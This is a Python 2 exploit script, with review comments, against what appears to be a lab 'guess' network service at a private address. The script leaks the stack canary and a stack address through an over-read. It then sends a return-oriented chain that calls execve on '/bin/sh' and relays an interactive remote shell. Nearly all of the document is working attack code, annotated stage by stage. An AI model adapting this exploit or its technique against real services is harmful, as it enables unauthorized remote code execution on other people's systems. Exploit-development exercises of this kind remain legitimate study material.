import socket
import struct
# Endpoint of the lab "guess" service; both values are hard-coded for this target.
IP = "192.168.1.104"
PORT = 44101

# A single persistent TCP connection; every stage below talks over this socket.
s = socket.create_connection((IP, PORT))
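def run(data, result=None):
    """Send one line to the service and optionally wait for a prompt.

    Uses the module-level socket ``s``.

    Args:
        data: Line to send (newline is appended); ``None``/``""`` sends nothing.
        result: Substring to wait for in the reply, e.g. the ``"guess: "``
            prompt; ``None`` skips the wait.

    Raises:
        EOFError: the peer closed the connection before ``result`` arrived
            (the previous version spun forever on an empty recv()).
    """
    if data:
        # sendall(): a plain send() may deliver only part of the buffer.
        s.sendall(data + "\n")
    if not result:
        return
    # Accumulate so a prompt split across two recv() chunks is still seen.
    seen = ""
    while True:
        chunk = s.recv(1024)
        if not chunk:
            raise EOFError("connection closed while waiting for %r" % result)
        seen += chunk
        if result in seen:
            return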
# Exploit stages against the lab "guess" service: sync with the prompt, leak
# the stack canary, leak a stack address, send a return-oriented chain, then
# relay an interactive session. Every offset (512, 524, 535, 588) and every
# 0x08... address is specific to this target binary. The script is Python 2
# (str payloads, raw_input).

# --- Stage 0: wait for the first prompt -------------------------------------
print("[*] Init")
run(None, "guess: ")

# --- Stage 1: leak the stack canary -----------------------------------------
# 512 bytes of filler followed by "\x03" (presumably the terminator the
# service expects -- confirm against the server). The reply is sliced raw:
# bytes 524..526 are taken as the canary's three non-zero bytes and a "\x00"
# low byte is re-attached, so the canary is assumed to be NUL-terminated.
# The leak presumably relies on the service echoing its buffer past the
# overwritten terminator; bounding the echo to the received length would
# close it. NOTE(review): send() may deliver only part of the buffer;
# sendall() is the safe call here and in the later stages.
print("[*] Leak stack canary")
s.send("A"*(511 + 1)+"\x03")
r = s.recv(1024)
canary = "\x00"+r[524:527]
# struct "I" is native byte order; assumes a little-endian host like the target.
print("[*] Found canary: %s" % hex(struct.unpack("I", canary)[0]))
run(None, "guess: ")

# --- Stage 2: leak a stack address ------------------------------------------
# Same overflow, 11 bytes longer, so the echo now reaches a 4-byte value at
# reply offset 535..538 -- presumably a saved stack pointer. Subtracting 588
# rebases it to the address the payload is built against; the same constant
# is added back at "stack + 588" below.
print("[*] Leak stack position")
s.send("A"*(511 + 12)+"\x03")
r = s.recv(1024)
stack = r[535:539]  # dead store: overwritten by the unpacked value on the next line
stack = struct.unpack("I", r[535:539])[0] - 588
print("[*] Stack: %s" % hex(stack))
run(None, "guess: ")

# --- Stage 3: build the payload ---------------------------------------------
# Despite the label, no machine code is injected: the payload is a chain of
# addresses inside the target binary. Layout in the 512-byte buffer:
# "exit\0" at offset 0, "/bin/sh\0" at offset 5, filler to 512, then the
# leaked canary (so the stack check passes), 8 bytes for the frame slots
# between canary and return address, then the chain. The gadget semantics
# are not visible here; the per-line notes state what each word appears to
# be for -- confirm against the binary's disassembly.
print("[*] Write shellcode")
payload = "exit\x00/bin/sh\x00"
payload += "A"*(512 - len(payload))
payload += canary                          # restores the stack-protector value
payload += "B"*8                           # saved frame slots between canary and ret
payload += struct.pack("<I", stack + 588)  # the leaked stack value, rebase undone
payload += struct.pack("<I", 0x080540cd)   # target-specific address
payload += "\x00"*4
payload += struct.pack("<I", stack + 5)    # -> "/bin/sh" at buffer offset 5
payload += struct.pack("<I", 0x080540a6)   # target-specific address
payload += "\x00"*4
payload += struct.pack("<I", 0x080a87d6)   # target-specific address
payload += "\x0b\x00\x00\x00"              # 11 LE -- presumably the x86 execve syscall number; verify
payload += struct.pack("<I", 0x08053ED2)   # target-specific address
payload += "\x03"                          # same terminator as the leak stages

# --- Stage 4: deliver and relay ---------------------------------------------
print("[*] Drop the bomb")
s.send(payload)
s.send("echo 0wn3d\n")  # marker command; its echo in the next recv() presumably confirms success
# Interactive relay between stdin and the socket. NOTE(review): recv()
# returns "" once the peer closes, after which this loop spins on empty
# prints instead of exiting -- an empty chunk should break the loop.
while True:
    print(s.recv(2048))
    d = raw_input("$ ")
    s.send(d+"\n")